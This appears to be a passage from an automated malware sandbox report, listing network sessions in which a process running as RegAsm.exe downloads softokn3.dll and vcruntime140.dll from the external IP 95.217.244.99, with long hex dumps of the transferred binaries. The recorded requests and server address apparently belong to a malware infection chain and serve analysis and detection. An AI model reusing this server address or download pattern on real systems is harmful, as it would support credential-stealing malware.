                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                      Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                      Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                      Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                      Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                      Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                      Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      14192.168.2.64972495.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:19 UTC158OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:19 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:19 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 257872
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-04-23 19:44:19 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                      2024-04-23 19:44:19 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                      2024-04-23 19:44:19 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                      Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                      Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                      Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                      Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                      Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                      Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                      Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                      Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      15192.168.2.64972595.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:20 UTC162OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:21 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:21 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 80880
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-04-23 19:44:21 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                      2024-04-23 19:44:21 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                      Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                      2024-04-23 19:44:21 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                      Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
